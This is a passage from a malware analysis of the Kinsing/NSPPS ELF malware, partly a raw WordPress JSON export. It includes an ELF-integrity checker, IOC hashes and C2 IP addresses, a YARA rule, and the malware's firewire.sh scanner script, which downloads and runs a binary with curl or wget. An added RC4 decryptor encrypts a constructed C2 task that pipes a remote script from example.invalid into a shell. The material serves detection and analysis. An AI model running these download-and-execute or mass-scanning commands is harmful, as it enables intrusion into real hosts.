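SHT_STRTAB = 3
SHT_NOBITS = 8
EHDR_SIZE = 64
SHDR_SIZE = 64


def parse_sections(data: bytes) -> list[tuple[int, int, int]]:
    """Return (sh_type, sh_offset, sh_size) for every section of a little-endian ELF64 image.

    Raises ValueError when the ELF header or the section header table itself does
    not fit in the data, which is the first thing a cut-off file reveals.
    """
    if len(data) < EHDR_SIZE or data[:4] != ELF_MAGIC:
        raise ValueError("not a complete ELF header")
    if data[4] != ELFCLASS64 or data[5] != ELFDATA2LSB:
        raise ValueError("only little-endian ELF64 is handled here")
    e_shoff = struct.unpack_from("<Q", data, 0x28)[0]          # e_shoff
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)  # e_shentsize, e_shnum
    if e_shoff == 0 or e_shnum == 0:
        raise ValueError("no section header table")
    table_end = e_shoff + e_shnum * e_shentsize
    if table_end > len(data):
        raise ValueError(f"section header table ends at {table_end}, file is {len(data)} bytes")
    sections = []
    for i in range(e_shnum):
        # Elf64_Shdr: name(4) type(4) flags(8) addr(8) offset(8) size(8) link info align entsize
        sh_type, sh_offset, sh_size = struct.unpack_from("<4xI16xQQ", data, e_shoff + i * e_shentsize)
        sections.append((sh_type, sh_offset, sh_size))
    return sections


def elf_is_complete(data: bytes) -> tuple[bool, str]:
    """Strict check: every section that occupies file bytes must end inside the file."""
    try:
        sections = parse_sections(data)
    except ValueError as exc:
        return False, str(exc)
    for idx, (sh_type, off, size) in enumerate(sections):
        if sh_type == SHT_NOBITS:  # .bss has a size but takes no bytes in the file
            continue
        if off + size > len(data):
            return False, f"section {idx} ends at {off + size}, file is {len(data)} bytes"
    return True, "all sections fit in the file"


def yara_style_check(data: bytes) -> bool:
    """The heuristic of the Appendix A rule: sum of the first eight section sizes <= filesize.

    It catches cut-off files, but it also rejects a complete file whose NOBITS sections
    are large, because their size is counted although they occupy no file bytes.
    """
    try:
        sections = parse_sections(data)
    except ValueError:
        return False
    return sum(size for _, _, size in sections[:8]) <= len(data)


def build_sample_elf(text_size: int, bss_size: int) -> bytes:
    """Construct a minimal ELF64 image (not a real sample): NULL section, .text,
    a NOBITS .bss and .shstrtab, with the section header table at the very end."""
    shstrtab = b"\x00.text\x00.bss\x00.shstrtab\x00"
    text_off = EHDR_SIZE
    shstr_off = text_off + text_size
    shoff = shstr_off + len(shstrtab)
    shnum = 4
    ehdr = (ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + b"\x00" * 8
            + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0x401000, 0, shoff, 0,
                          EHDR_SIZE, 0, 0, SHDR_SIZE, shnum, 3))

    def shdr(name, sh_type, flags, addr, off, size, align):
        return struct.pack("<IIQQQQIIQQ", name, sh_type, flags, addr, off, size, 0, 0, align, 0)

    shdrs = (shdr(0, 0, 0, 0, 0, 0, 0)
             + shdr(1, SHT_PROGBITS, 0x6, 0x401000, text_off, text_size, 16)  # .text, AX
             + shdr(7, SHT_NOBITS, 0x3, 0x402000, shstr_off, bss_size, 16)    # .bss, WA
             + shdr(12, SHT_STRTAB, 0, 0, shstr_off, len(shstrtab), 1))       # .shstrtab
    image = ehdr + b"\x90" * text_size + shstrtab + shdrs
    assert len(image) == shoff + shnum * SHDR_SIZE
    return image


if __name__ == "__main__":
    full = build_sample_elf(text_size=4096, bss_size=256)
    cut = full[: len(full) // 3]  # the kind of fragment that gets uploaded to VirusTotal
    print("complete file:", elf_is_complete(full), yara_style_check(full))
    print("cut-off file: ", elf_is_complete(cut), yara_style_check(cut))
    big_bss = build_sample_elf(text_size=4096, bss_size=0x10000)
    print("large .bss:   ", elf_is_complete(big_bss), yara_style_check(big_bss))
```

Run it on a real file with elf_is_complete(open(path, "rb").read()). A fragment such as the 4.84 MB upload described above fails immediately, because the section header table, which linkers typically write at the end of the file, is missing; the strict check is also the one to prefer in a pipeline, since a large .bss on a legitimate binary makes the size-sum heuristic reject a complete file.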
For example, d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b is a known Kinsing sample 16.87 MB in size, while a51a4398dd7f11e34ea4d896cde4e7b0537351f82c580f5ec951a8e7ea017865, uploaded to VirusTotal on 19 June 2020 and flagged as Kinsing by some AV vendors, is in fact just the first 4.84 MB of that sample.<\/p>\n<p>These partial samples may come from an attacker testing different parts of the malware against AV engines, or from a security researcher examining sections of the code. To match only proper ELF files, a condition should therefore be added that accepts only files in which the sum of the section sizes does not exceed the size of the whole file (see the YARA rule below). Note that this is a heuristic: section sizes are not file offsets, and the rule only sums the first eight sections. A stricter check is that every section's file offset plus its size (skipping SHT_NOBITS sections such as .bss, which occupy no file bytes), and the section header table itself (e_shoff + e_shnum * e_shentsize), lie within the file.<\/p>\n<p><strong>Appendix A: IOCs and YARA<\/strong><\/p>\n<p><strong>IOCs:<\/strong><\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" width=\"100%\">\n<thead>\n<tr>\n<th width=\"80%\">Indicator<\/th>\n<th 
width=\"20%\">Type<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>0b0aa978c061628ec7cd611edeec3373d4742cbda533b07a2b3eb84a9dd2cb8a<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>0c811140be9f59d69da925a4e15eb630352fa8ad4f931730aec9ae80a624d584<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>2132d7bed60fda38adda28efdbbd2df2c9379fed5de2e68fc6801f5621b596b0<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>4b0138c12e3209d8f9250c591fcc825ee6bff5f57f87ed9c661df6d14500e993<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>4f4e69abb2e155a712df9b3d0387f9fb2d6db8f3a2c88d7bbe199251ec08683f<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>511de8dd7f3cb4c5d88cd5a62150e6826cb2f825fa60607a201a8542524442e2<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>554c233d0e034b8bb3560b010f99f70598f0e419e77b9ce39d5df0dd3bc25728<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>655ee9ddd6956af8c040f3dce6b6c845680a621e463450b22d31c3a0907727e4<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>6814d22be80e1475e47e8103b11a0ec0daa3a9fdd5caa3a0558d13dc16c143d9<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>681f88d79c3ecab8683b39f8107b29258deb2d58fcea7b0c008bab76e18aa607<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>6e8c96f9e9a886fd6c51cce7f6c50d1368ca5b48a398cc1fedc63c1de1576c1e<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>7727a0b47b7fd56275fa3c1c4468db7fa201c788d1e56597c87deaff45aad634<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>7f9f8209dc619d686b32d408fed0beb3a802aa600ddceb5c8d2a9555cdb3b5e0<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>8c9b621ba8911350253efc15ab3c761b06f70f503096279f2a173c006a393ee1<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>a0363f3caad5feb8fc5c43e589117b8053cbf5bc82fc0034346ea3e3984e37e8<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<t
r>\n<td>a5b010a5dd29d2f68ac9d5463eb8a29195f40f5103e1cc3353be2e9da6859dc6<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>b44dae9d1ce0ebec7a40e9aa49ac01e2c775fa9e354477a45b723c090b5a28f2<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>c9932ca45e952668238960dbba7f01ce699357bedc594495c0ace512706dd0ac<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>ccfda7239b2ac474e42ad324519f805171e7c69d37ad29265c0a8ba54096033d<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>db3b9622c81528ef2e7dbefb4e8e9c8c046b21ce2b021324739a195c966ae0b7<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>f2e7244e2a7d6b28b1040259855aeac956e56228c41808bccb8e37d87c164570<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>104.248.3.165<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>139.99.50.255<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>185.61.7.8<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>188.120.254.224<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>193.33.87.220<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>195.123.220.193<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>45.10.88.102<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>46.229.215.164<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>46.243.253.167<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>47.65.90.240<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>62.113.112.127<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>67.205.161.58<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>91.215.169.111<\/td>\n<td>C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>YARA:<\/strong><\/p>\n<blockquote><p>import \"elf\"<\/p>\n<p>rule Kinsing_Malware<br \/>\n{<br \/>\nmeta:<br \/>\nauthor = \"Aluma Lavi, CyberArk\"<br \/>\ndate = \"22-01-2021\"<br \/>\nversion = \"1.0\"<br \/>\nhash = \"d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b\"<br \/>\ndescription = \"Kinsing\/NSPPS malware\"<br \/>\nstrings:<br \/>\n$rc4_key = { 37 36 34 31 35 33 34 34 36 62 36 31 } \/\/ ASCII \"764153446b61\"<br \/>\n$firewire = \".\/firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT\"<br \/>\n$packa1 = \"google\/btree\" ascii wide<br \/>\n$packa2 = \"kardianos\/osext\" ascii wide<br \/>\n$packa3 = \"kelseyhightower\/envconfig\" ascii wide<br \/>\n$packa4 = \"markbates\/pkger\" ascii wide<br \/>\n$packa5 = \"nu7hatch\/gouuid\" ascii wide<br \/>\n$packa6 = \"paulbellamy\/ratecounter\" ascii wide<br \/>\n$packa7 = \"peterbourgon\/diskv\" ascii wide<br \/>\n$func1 = \"main.RC4\" ascii wide<br \/>\n$func2 = \"main.runTaskWithScan\" ascii wide<br \/>\n$func3 = \"main.backconnect\" ascii wide<br \/>\n$func4 = \"main.downloadAndExecute\" ascii wide<br \/>\n$func5 = \"main.startCmd\" ascii wide<br \/>\n$func6 = \"main.execTaskOut\" ascii wide<br \/>\n$func7 = \"main.minerRunningCheck\" ascii wide<br \/>\ncondition:<br \/>\n\/\/ ELF magic, and the first eight sections must fit inside the file (rejects cut-off uploads)<br \/>\n(uint16(0) == 0x457F<br \/>\nand not (elf.sections[0].size + elf.sections[1].size + elf.sections[2].size + elf.sections[3].size + elf.sections[4].size + elf.sections[5].size + elf.sections[6].size + elf.sections[7].size &gt; filesize))<br \/>\nand ($rc4_key<br \/>\nor $firewire<br \/>\nor all of ($packa*)<br \/>\nor 4 of ($func*)<br \/>\n)<br \/>\n}<\/p><\/blockquote>\n<p><strong>Appendix B: Firewire.sh Script<\/strong><\/p>\n<p>The script (firewire is the renamed Masscan binary) installs libpcap on RHEL or Debian-based hosts, verifies the MD5 of the firewire binary and re-downloads it from $MASSCAN when the hash does not match, then runs the scan, retrying with sudo if the first attempt fails.<\/p>\n<blockquote><p>#!\/bin\/sh<br \/>\nPORT=$1<br \/>\nRATE=$2<br \/>\nINPUT=$3<br \/>\nOUTPUT=$4<br \/>\nMASSCAN=$5<\/p>\n<p>cat \/etc\/os-release | grep -vw grep | grep \"rhel\" &gt;\/dev\/null<br \/>\nif [ $? -eq 0 ]<br \/>\nthen<br \/>\nrpm -qa | grep libpcap-dev &gt; \/dev\/null<br \/>\nif [[ $? -eq 0 ]]; then<br \/>\necho \"Package is installed rhel!\"<br \/>\nelse<br \/>\necho \"Package is NOT installed rhel!\"<br \/>\nyum -y update<br \/>\nyum -y install libpcap-devel<br \/>\nfi<br \/>\nelse<br \/>\nif [ $(dpkg-query -W -f='${Status}' libpcap-dev 2&gt;\/dev\/null | grep -c \"ok installed\") -eq 0 ];<br \/>\nthen<br \/>\necho \"Package is NOT installed deb!\"<br \/>\napt-get update<br \/>\napt-get install -y libpcap-dev<br \/>\nelse<br \/>\necho \"Package is installed deb!\"<br \/>\nfi<br \/>\nfi<\/p>\n<p>if [ -x \"$(command -v md5sum)\" ]; then<br \/>\nsum=$(md5sum firewire | awk '{ print $1 }')<br \/>\necho $sum<br \/>\ncase $sum in<br \/>\n45a7ef83238f5244738bb5e7e3dd6299)<br \/>\necho \"firewire OK\"<br \/>\n;;<br \/>\n*)<br \/>\necho \"firewire wrong\"<br \/>\n(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)<br \/>\n;;<br \/>\nesac<br \/>\nelse<br \/>\necho \"No md5sum\"<br \/>\n(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)<br \/>\nfi<\/p>\n<p>chmod +x firewire<\/p>\n<p>.\/firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2&gt;\/dev\/null<br \/>\nif [ $? -eq 0 ]<br \/>\nthen<br \/>\necho \"success\"<br \/>\nelse<br \/>\necho \"fail\"<br \/>\nsudo .\/firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2&gt;\/dev\/null<br \/>\nif [ $? -eq 0 ]<br \/>\nthen<br \/>\necho \"success2\"<br \/>\nelse<br \/>\necho \"fail2\"<br \/>\nfi<br \/>\nfi<\/p><\/blockquote>\n<p><strong>Appendix C: NSPPS &amp; Kinsing Function List<\/strong><\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" width=\"100%\">\n<thead>\n<tr>\n<th width=\"50%\">NSPPS<\/th>\n<th width=\"50%\">Kinsing<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>DownloadFile<\/td>\n<td>DownloadFile<\/td>\n<\/tr>\n<tr>\n<td>ExecOutput<\/td>\n<td>ExecOutput<\/td>\n<\/tr>\n<tr>\n<td>Hosts<\/td>\n<td>Hosts<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>Pid<\/td>\n<\/tr>\n<tr>\n<td>RC4<\/td>\n<td>RC4<\/td>\n<\/tr>\n<tr>\n<td>RandStringRunes<\/td>\n<td>RandStringRunes<\/td>\n<\/tr>\n<tr>\n<td>Result<\/td>\n<td>Result<\/td>\n<\/tr>\n<tr>\n<td>SetSocks<\/td>\n<td>SetSocks<\/td>\n<\/tr>\n<tr>\n<td>Specification<\/td>\n<td>Specification<\/td>\n<\/tr>\n<tr>\n<td>TargetsWrapper<\/td>\n<td>TargetsWrapper<\/td>\n<\/tr>\n<tr>\n<td>Task<\/td>\n<td>Task<\/td>\n<\/tr>\n<tr>\n<td>TaskPair<\/td>\n<td>TaskPair<\/td>\n<\/tr>\n<tr>\n<td>addResult<\/td>\n<td>addResult<\/td>\n<\/tr>\n<tr>\n<td>backconnect<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>checkHealth<\/td>\n<td>checkHealth<\/td>\n<\/tr>\n<tr>\n<td>connectForSocks<\/td>\n<td>connectForSocks<\/td>\n<\/tr>\n<tr>\n<td>contains<\/td>\n<td>contains<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>copyFileContents<\/td>\n<\/tr>\n<tr>\n<td>doRequestWithTooManyOpenFiles<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>doTask<\/td>\n<td>doTask<\/td>\n<\/tr>\n<tr>\n<td>downloadAndExecute<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>encStruct<\/td>\n<td>encStruct<\/td>\n<\/tr>\n<tr>\n<td>execTask<\/td>\n<td>execTask<\/td>\n<\/tr>\n<tr>\n<td>execTaskOut<\/td>\n<td>execTaskOut<\/td>\n<\/tr>\n<tr>\n<td>getActiveC2CUrl<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>getMinerPid<\/td>\n<\/tr>\n<tr>\n<td>getOrCreateListForTaskResult<\/td>\n<td>getOrCreateListForTaskResult<\/td>\n<\/tr>\n<tr>\n<td>getOrCreateRateCounterForTask<\/td>\n<
td>getOrCreateRateCounterForTask<\/td>\n<\/tr>\n<tr>\n<td>getOrCreateUuid<\/td>\n<td>getOrCreateUuid<\/td>\n<\/tr>\n<tr>\n<td>getTargets<\/td>\n<td>getTargets<\/td>\n<\/tr>\n<tr>\n<td>getTask<\/td>\n<td>getTask<\/td>\n<\/tr>\n<tr>\n<td>getWriteableDir<\/td>\n<td>getWriteableDir<\/td>\n<\/tr>\n<tr>\n<td>go<\/td>\n<td>go<\/td>\n<\/tr>\n<tr>\n<td>hash_file_md5<\/td>\n<td>hash_file_md5<\/td>\n<\/tr>\n<tr>\n<td>healthChecker<\/td>\n<td>healthChecker<\/td>\n<\/tr>\n<tr>\n<td>inc<\/td>\n<td>inc<\/td>\n<\/tr>\n<tr>\n<td>init<\/td>\n<td>init<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>isMinerRunning<\/td>\n<\/tr>\n<tr>\n<td>main<\/td>\n<td>main<\/td>\n<\/tr>\n<tr>\n<td>makeClient<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>masscan<\/td>\n<td>masscan<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>minRun<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>minerRunningCheck<\/td>\n<\/tr>\n<tr>\n<td>move<\/td>\n<td>move<\/td>\n<\/tr>\n<tr>\n<td>randIntRange<\/td>\n<td>randIntRange<\/td>\n<\/tr>\n<tr>\n<td>redisBrute<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>request<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>resultSender<\/td>\n<td>resultSender<\/td>\n<\/tr>\n<tr>\n<td>runTask<\/td>\n<td>runTask<\/td>\n<\/tr>\n<tr>\n<td>runTaskWithHttp<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>runTaskWithScan<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>runcmd<\/td>\n<td>runcmd<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>sendMinerPid<\/td>\n<\/tr>\n<tr>\n<td>sendResult<\/td>\n<td>sendResult<\/td>\n<\/tr>\n<tr>\n<td>sendSocks<\/td>\n<td>sendSocks<\/td>\n<\/tr>\n<tr>\n<td>setActiveC2CUrl<\/td>\n<td>setActiveC2CUrl<\/td>\n<\/tr>\n<tr>\n<td>setExecOutput<\/td>\n<td>setExecOutput<\/td>\n<\/tr>\n<tr>\n<td>setLog<\/td>\n<td>setLog<\/td>\n<\/tr>\n<tr>\n<td>setUuid<\/td>\n<td>setUuid<\/td>\n<\/tr>\n<tr>\n<td>socks<\/td>\n<td>socks<\/td>\n<\/tr>\n<tr>\n<td>startCmd<\/td>\n<td>startCmd<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>startCmdWithOutputSingle<\/td>\n<\/tr>\n<tr>\n<td>startSocks<\/td>\n<td>startSocks<\/td>\n<\/tr>\n<tr>\n<td>syncCmd<\/td>\n<td>syncCmd<\/td>\n<\/tr>\n<tr>\n
<td>taskScan<\/td>\n<td>taskScan<\/td>\n<\/tr>\n<tr>\n<td>taskWithHttpWorker<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>taskWithScanWorker<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>taskWorker<\/td>\n<td>taskWorker<\/td>\n<\/tr>\n<tr>\n<td>tcpTask<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>updateTask<\/td>\n<td>updateTask<\/td>\n<\/tr>\n<tr>\n<td>writable<\/td>\n<td>writable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>What is Kinsing? Recently we have been busy researching the evolving landscape of cloud and container threats. Why focus here? Because as this technology becomes more popular and keeps evolving, attackers also refine their techniques to break into these systems. During our research we came across Kinsing, an ELF malware that has featured in several attack campaigns, including ones against Redis and SaltStack. 
Kinsing, over the last few &hellip;<\/p>\n","protected":false},"author":1,"featured_media":8770,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[232],"tags":[],"class_list":["post-8761","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"_links":{"self":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/posts\/8761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/comments?post=8761"}],"version-history":[{"count":0,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/posts\/8761\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/media\/8770"}],"wp:attachment":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/media?parent=8761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/categories?post=8761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/tags?post=8761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
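Added example for the main.RC4 comparison in the similarities section of the article above. This is not code from the article, from CyberArk or from the malware itself; it is a plain Python implementation of RC4 (key scheduling plus the keystream generator), with the key bytes taken from the $rc4_key pattern of the YARA rule in Appendix A, which spell the ASCII string 764153446b61. That this string is used unchanged as the RC4 key on C2 traffic, and the task format decrypted here, are assumptions made for illustration; the C2 message and the binary blob are constructed, not captured. A published RC4 test vector is included so the implementation can be checked before it is pointed at real traffic.

```python
"""RC4 as implemented by the main.RC4 function shared by NSPPS and Kinsing (added example)."""
from __future__ import annotations

# ASCII "764153446b61": the bytes of the $rc4_key pattern in the Appendix A YARA rule.
# That this exact 12-byte string is the key applied to C2 traffic is an assumption here.
KINSING_RC4_KEY = bytes.fromhex("373634313533343436623631")


def rc4_ksa(key: bytes) -> list[int]:
    """Key-scheduling algorithm: permute 0..255 under the key bytes."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """PRGA: XOR data with the keystream; the same call encrypts and decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def find_rc4_key(blob: bytes, key: bytes = KINSING_RC4_KEY) -> list[int]:
    """Offsets of the key bytes inside a binary image, as the $rc4_key string would match."""
    offsets, start = [], 0
    while (pos := blob.find(key, start)) != -1:
        offsets.append(pos)
        start = pos + 1
    return offsets


def decrypt_task(blob: bytes) -> str:
    """Decrypt an RC4-protected C2 task with the Kinsing key and return it as text.

    The task being UTF-8 text is an assumption of this example; a UnicodeDecodeError
    on real traffic means the key or the framing is not what was assumed.
    """
    return rc4_crypt(KINSING_RC4_KEY, blob).decode("utf-8")


if __name__ == "__main__":
    # Constructed, not captured: a task a C2 might send, protected with the key.
    task = b'{"id":"t1","cmd":"curl -s http://example.invalid/x.sh | sh"}'
    wire = rc4_crypt(KINSING_RC4_KEY, task)
    print("round trip ok:", decrypt_task(wire) == task.decode())
    # Constructed binary blob with the key embedded twice, as a scanner would see it.
    image = b"\x7fELF" + b"\x00" * 32 + KINSING_RC4_KEY + b"\x00" * 16 + KINSING_RC4_KEY
    print("key offsets:", find_rc4_key(image))
```

Because RC4 is a stream cipher with no integrity protection, a wrong key does not fail loudly; it yields garbage that merely fails to decode, so keep the published test vector (key "Key", plaintext "Plaintext" gives bbf316e8d940af0ad3) as the sanity check that the implementation, not the key, is correct.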